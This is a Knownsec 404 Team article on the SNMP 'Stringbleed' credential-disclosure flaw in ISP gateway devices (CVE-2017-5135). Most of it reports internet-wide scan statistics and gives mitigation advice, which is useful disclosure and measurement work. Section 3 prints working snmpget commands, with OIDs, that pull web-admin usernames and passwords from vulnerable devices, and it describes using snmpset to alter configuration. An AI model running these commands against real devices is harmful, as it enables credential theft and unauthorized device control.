Author: Knownsec 404 Team
Chinese version: https://paper.seebug.org/795/

1. Update

2. Brief Introduction

The SNMP protocol[1], which is the Simple Network Management Protocol (SNMP), has a default port of 161/UDP. There are currently three versions: V1, V2c, and V3. V3 is the latest version and has been greatly improved in security design. However, the most widely used versions are the V1 and V2c versions with more security issues. In simple terms, the principle of the SNMP protocol works by the management host sending a request to the managed host or device. This request contains a community and an oid. Oid is a codename that represents the information requested by the management host. After receiving the request, the managed host confirms whether the requested community is consistent with the one saved by itself. If so, the corresponding information is returned to the management host. Otherwise, no information will be returned. So the community is equivalent to an authentication password. Both V1 and V2c versions of SNMP protocol transmit data in plaintext, so the community needed for authentication can be obtained by means of packet sniffing.

On December 25, 2018, the Seebug platform included multiple sensitive information disclosure vulnerabilities based on the SNMP protocol[2]. Among the gateway devices provided by various vendors, it is easy to use any community to read the username and password, Wi-Fi credentials, etc. of the web management system in the clear text provided by SNMP. Using any community to send configuration updates or control requests via SET protocol directives, an attacker can inject a malicious configuration. For example, the Cisco DPC3928SL caused the XSS (CVE-2018-20379) of the Web Management System by injecting payload to the SSID.

The vulnerability was first exposed on April 4, 2017, and the CVE number is CVE-2017-5135. The discoverer called this vulnerability Stringbleed[3]. On December 22, 2018, after more than a year, the finder provided a comprehensive vulnerability impact list after global exploration, including 78 different types of gateway devices from 23 different vendors, and applied for multiple CVEs at the same time. Up to now, there is still no final conclusion about the cause of the vulnerabilities. According to the results of community discussions[4], the reasons for the vulnerability may be as follows:

  • These vulnerable devices are implemented using the same SNMP protocol with logical flaws. The implementation code does not properly handle community string authentication, resulting in any community being successfully authenticated, further causing sensitive information to leak.
  • ISP configuration error, invalid access control rules.

This article does not include vulnerability analysis, but a data analysis report on the existing situation of such device vulnerabilities worldwide.

3. Vulnerability recurrence

Simply send an SNMP GET request directly using the snmpget command. The -c option can specify any string as the community to be authenticated.

# Sysinfo
snmpget -v 1 -c public $IP iso.3.6.1.2.1.1.1.0
# Web interface username
snmpget -v 1 -c '#Stringbleed' $IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
# Web interface password
snmpget -v 1 -c '#Stringbleed' $IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0o

The results are as follows:

img

If the target device is open to the web service, the attacker can log in to the web management system using the leaked username and password, as follows:

img

One situation worth mentioning is that the username and password are both empty.

img

The attacker can also send an SNMP SET request for configuration updates. The -c option specifies any string as the community. As shown below, we modified the web system username via snmpset.

img

4. Vulnerability Impact

We extracted 1,241,510 IP data on the ZoomEye Cyberspace Search Engine by searching the "keywords" associated with the vulnerability device[5].

img

By using zmap to perform a survival check on the 1.24 million IP data, we found that there were around 230,000 surviving IPs. Further vulnerability testing of these IPs revealed that there were 15882 target devices with this sensitive information disclosure vulnerability, involving multiple firmware versions of multiple models of 23 vendors.

According to the information aggregation of the 15882 vulnerability devices, the statistics of the obtained vendors and versions are as follows (the ZoomEye dork of each model is: Vendor +Model + corresponding model, such as the syntax of searching DPC3928SL: Vendor +Model + DPC3928SL)

The vendor's distribution pie chart for the vulnerability device is as follows (it is worth noting that the DPC3928SL gateway device is one of the most severely affected network devices, originally owned by Cisco, now Technicolor).

img

The top ten countries are distributed as follows, mainly in China, Thailand, Korea and other countries.

img

For all devices with this vulnerability, we counted the use of the credential as follows:

Common usernames, mainly including admin, login, user, dlink, etc.

img

Common passwords, mainly including admin, password, dream01, empty, br0adband, gzcatvnet, user, Broadcom, dlink, ambit, root, etc., most of which are common weak passwords.

img

Interestingly enough, we found the following most frequently used username and password combinations, the vulnerability devices that use the most combined credentials, and the countries in which these devices are located have some relevance. (For example, the first line records: about 5502 of all devices in China that contain this vulnerability use admin: admin as credentials. The largest number of affected equipment models is Technicolor/CWA0101.)

5. Summary

Undoubtedly, this is not a problem with the SNMP protocol itself, but a flaw in the implementation code of the protocol or an ISP configuration error. This vulnerability affects a large number of vendors and devices, and presents a certain regionality.

Information disclosure vulnerabilities in IoT devices such as routers, modems, and cameras are endless, posing a great threat to personal privacy. Turning off unnecessary ports or using a firewall to restrict illegal access is a worthwhile consideration.

The safety of the system often depends on the shortest piece of wood - the "Wooden barrel effect". The SNMP protocol leaking HTTP service credentials is a good illustration of this.

Users can verify the device's vulnerability based on the PoC and contact the appropriate ISP to find a solution.

6. REF

[1] SNMP protocol
https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol

[2] Seebug vulnerability database
https://www.seebug.org/vuldb/ssvid-97741
https://www.seebug.org/vuldb/ssvid-97742
https://www.seebug.org/vuldb/ssvid-97736

[3] Stringbleed
https://stringbleed.github.io/

[4] Discussion about the vulnerability
https://www.reddit.com/r/netsec/comments/67qt6u/cve_20175135_snmp_authentication_bypass/

[5] ZoomEye Cyberspace Search Engine
https://www.zoomeye.org/searchResult?q=MODEL%20%2BVENDOR%20%2Bport%3A%22161%22


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/796/